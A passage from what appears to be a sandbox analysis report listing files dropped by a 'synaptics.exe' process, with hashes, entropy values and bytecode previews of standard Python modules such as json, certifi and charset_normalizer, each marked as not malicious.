                                                                                                                                                                                                                                  Preview:o........'-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r......C:\Users\Public\M20EKMMEH2\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c..................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1927
                                                                                                                                                                                                                                  Entropy (8bit):5.610481446814692
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Uwhn/cfelN3xf9oIIv3y1R0vSFkg4VTdOIC54vD:j0MFLIPwETd9CeD
                                                                                                                                                                                                                                  MD5:EB817D1E0C3FA8F004EAB20EFA5F6E8F
                                                                                                                                                                                                                                  SHA1:B7F2B61DF28F23C3BA6D5EC5E347444FBAD29533
                                                                                                                                                                                                                                  SHA-256:360F50253A2FD2C64EB9AC02EF1C910878265044CB5AC21D59E42E99E520A88C
                                                                                                                                                                                                                                  SHA-512:47D9AC8F703AA42AADB9AE631BE7CE3295BC1FF00B3D4A52B9351CB6D36651BAD200A2067FA0345B357F71FACBBB828906BD46BE7F1F086A50CC517337D6CBF8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66902
                                                                                                                                                                                                                                  Entropy (8bit):5.227788604327694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pdNUv9zPwqY+L88QliC9Xxa2F3rnM4mpcQS1w+xtZUuJpw2bEOrQ0aWsV:pdylme88Qli8X82JrMFcT/yN1V
                                                                                                                                                                                                                                  MD5:29092DDE80486C3ABBDBE9E5FF66D05E
                                                                                                                                                                                                                                  SHA1:7D41A18D4E02EB9F620A0D49D14193A0340BFCC9
                                                                                                                                                                                                                                  SHA-256:5E178D63D0E4350C70D2EA0DD0CF01748A4829D31298E56A641B78DAAC299013
                                                                                                                                                                                                                                  SHA-512:6EA9599AD3F361E229027EDEB6CBF1898B73F4B7EE27D352CEA4F6C55B690FE3799958D7F548FF5C7DBBECF4D03CB709FD3BE757242DFCF2A416A9E4BA7C3296
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7563
                                                                                                                                                                                                                                  Entropy (8bit):5.077688752377494
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:CcgPE5vcnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:iyvcnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                                                  MD5:98E5FA7A0689796A8F104E6189C99463
                                                                                                                                                                                                                                  SHA1:6FFB5F1D7F5E60488A4F13AA3361548B4F248D82
                                                                                                                                                                                                                                  SHA-256:2832D8FAD3F3DE4DF41F9335A2AEF55B63452BC39878B1B7D1CFD8308C819016
                                                                                                                                                                                                                                  SHA-512:A10EE1315FFAB419FAA2B9A191E7DD7950E71B8665740D26C866A1F3CDD839FBCC2156BEB1ABFFC9D098910DA4D2093A7E8163821BF57BA0B1053D62125791C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o..........f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):270
                                                                                                                                                                                                                                  Entropy (8bit):5.065268054699536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/AJteNbsZvEG/Xg6nCbWjN2o1mf+uaHKdArsq4G:CAjeNQeGVN2o1chq7
                                                                                                                                                                                                                                  MD5:4EA6B4E0739991A177FFF151F17C04B6
                                                                                                                                                                                                                                  SHA1:FDB3D9F4BB0FB4A59C80FA955CFA8D24F3A70FFC
                                                                                                                                                                                                                                  SHA-256:F00BF4D60B6D81FB6C9878E589F97103C89DA5141C3C3C9AA4D2BDFAAD4D7ED2
                                                                                                                                                                                                                                  SHA-512:1F10F2C4877E75D075810DFE26F83909130A67E155D7D301D542610956614185CFE4014CE51BF3F12F536753BD5C4A8FAFBC65CFD583038AF26BA52163AB46C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2101
                                                                                                                                                                                                                                  Entropy (8bit):4.9448873737927865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tNBUoxmgDZLawhAl/g95K3Q8+epPUHq7J8nH:dUC/Rcg955epA1H
                                                                                                                                                                                                                                  MD5:2AA1F61C76D8A2A6285241CE124AFC54
                                                                                                                                                                                                                                  SHA1:6CA51DA0F75E04394E505ACA66F313C9E6D3FEFE
                                                                                                                                                                                                                                  SHA-256:E9441768E243529AC18DD9345DED9D8F232460E36A7E1F89CEB2FD3287EBB156
                                                                                                                                                                                                                                  SHA-512:4898EBC4BCA12848E9841DC7C7A2FF0750E9DF804CA0E6A6AB7D35EE9F58DD93135BFE019B0B4629040C28ED1938640A6CD743D0ED004F5872259A7AF416F7CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....<C:\Users\Public\M20EKMMEH2\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......rea
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1566
                                                                                                                                                                                                                                  Entropy (8bit):5.711048250244809
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:A4jbqjQtyat/c2vhCMhju/C/yv+KbheUy:AWbqjQttwZ/C/yvvteUy
                                                                                                                                                                                                                                  MD5:FD57442F5CAE13FD7A6AFB14E83FFC37
                                                                                                                                                                                                                                  SHA1:F56132F3A13233F74A7502C566E8AE4A9CDEF677
                                                                                                                                                                                                                                  SHA-256:3DA724D1D76947D0709E5AE327E4E7FE5DC217211375EF8949CBEF3EF3C0F090
                                                                                                                                                                                                                                  SHA-512:F1208FD9C9478BFBFE3DF0634C08AB76A86A145E0C57D19B6D55BB698C9458B60CED4629911F4FD1D38ADE5221F8A1943A4C332FA5678E564D1796C024435423
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11383
                                                                                                                                                                                                                                  Entropy (8bit):5.821921419246986
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OWeJLd8V6fySfPAraft774k4M1Cz9ZZERVOBJnCTrFkYAr64BpmA+ifAgQSK5FQm:OWeJLdcS7ft77cZZaKnCvNm64mA+ifA9
                                                                                                                                                                                                                                  MD5:66A91A2CE100061DC8BD3FE007041E2A
                                                                                                                                                                                                                                  SHA1:C49666C2D781CE2C91A1C8729471E4E79BC8EA03
                                                                                                                                                                                                                                  SHA-256:7AB3E836A2B5A7B68A8618749D71D0E2F235C97613A136966B0FA953D9F8D830
                                                                                                                                                                                                                                  SHA-512:B2966B1E0E28D004D1722CAC4BAFE506B3E6F16EACCAD7CAFE4B656425D86AF47A757C8BAD7C322F3E7BDEB0F1B10A4E658BC5473F33FC89387A836A53799D01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9644
                                                                                                                                                                                                                                  Entropy (8bit):5.516539400039446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6q5CeApoIRl8if8gZ+hjj2mspqjrOBTLpPc7nSgGKO56ytTatX79w/kfTYY:V5uTf8g5mymOBT9Pc7nLGKO56yQt7e/G
                                                                                                                                                                                                                                  MD5:464CD6A50796BC9E8F9FB745026A7FDA
                                                                                                                                                                                                                                  SHA1:3B86678997FE02DAA79F32F52E6EBAEB4628C4D2
                                                                                                                                                                                                                                  SHA-256:7CC39F5E12D2183A0B13FA0F905991EC33708BAB80FD034E00B4DDA00945A417
                                                                                                                                                                                                                                  SHA-512:59D636465D101046D3BFEEC686440D523A2F9E102532B881443AA24AAD62306AC2B86E345EC9A69B6F8107FC6E72F3A39477A79BEE0684D2DB380AAFA23B3F34
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30432
                                                                                                                                                                                                                                  Entropy (8bit):5.8813773858453775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qvZKN0taqbKcwF7wuCDDFebpp2dmnFu3GJusAVlufzR7c:qvZ6EKcR7NcP8g8luft7c
                                                                                                                                                                                                                                  MD5:3BA8115C5E6360531C78ED5A4E1622AE
                                                                                                                                                                                                                                  SHA1:8FC95B3E3A2DD21262E89EA8D91C1AB0D4D09763
                                                                                                                                                                                                                                  SHA-256:DF5614503CC721BFE7BD3B6C7DBAE963DB2CCD1593420A9B2F7E18C869C71BA9
                                                                                                                                                                                                                                  SHA-512:F63209DB3AEF7C5FF713ED6EE832B4F10A796D7AD53D58EE7FB2E962F4B270077206AD6B7D058A32210B88D7AF2AD7C1C6066655F82A16816DE314BDCA5A43FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1832
                                                                                                                                                                                                                                  Entropy (8bit):5.510476363041549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:owwE8mcebSh3Ue75yubxeNOhsV4the+NK29:owAmcebSyo5yc4NFV4Pe+Nn
                                                                                                                                                                                                                                  MD5:141224151438D92BD26939D9027DFCF2
                                                                                                                                                                                                                                  SHA1:CC4439C184DB58955B1FDD984B4743EF5EDE6203
                                                                                                                                                                                                                                  SHA-256:E0222F540B50E3CBE4802C8E5D6E07F507024E888EBD82686BA016C7ED6C32E1
                                                                                                                                                                                                                                  SHA-512:6DC9F3563DE83D9F9D79FA19FDE127CAED32C41E829CC6218BAAF442ABCD4C6E547984250324922798F84B62545C2FC97E57D117EEB5E65BCB9F9299EFCC360F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11527
                                                                                                                                                                                                                                  Entropy (8bit):5.173759325973184
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:N3Ou/wM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:NeuYM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                                                                  MD5:C9AC7B038F5571B937D6A16B4314FB13
                                                                                                                                                                                                                                  SHA1:3F3AE4A46B718DA6FE44A3734AF8C3AA3BEAB5F4
                                                                                                                                                                                                                                  SHA-256:9BBDC4E189BF0C955FA9BE8FB9D51A8495306E3FEB3011954DC41653D7A53DBD
                                                                                                                                                                                                                                  SHA-512:5E1A5CFC5F9EF325DF19E6E49758C67A5BD52B2208327A881220DE44774F7885F8B3CDDE5F0377B1823829794C9E6AF551A4A327FCB772B327FDA3FABE01B80E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8908
                                                                                                                                                                                                                                  Entropy (8bit):5.4660542464474515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:k8kSSE/TPTRTa5Tl1T+T8IunXU92ZQF4lYuoFaFEj:5SkrBalFA8ImE8y6rFo
                                                                                                                                                                                                                                  MD5:DB153734CCA2E197E2FA342A1AA837FB
                                                                                                                                                                                                                                  SHA1:3737E311C94D779DAE3A92B21E6A995417E28DCF
                                                                                                                                                                                                                                  SHA-256:1EC349B471312CDD14B52C703E73AD03AD05DE00670541FE0A62F68F1A6C47EE
                                                                                                                                                                                                                                  SHA-512:7CC8A44672E2FEEA29EE3337CED00B7EBB0D81A24D03044CD9934635EE4300411EFDFBA42498BA35B5F36FC1889835E6357C506663ED898B68D0813440FF37AE
                                                                                                                                                                                                                                  Malicious:false
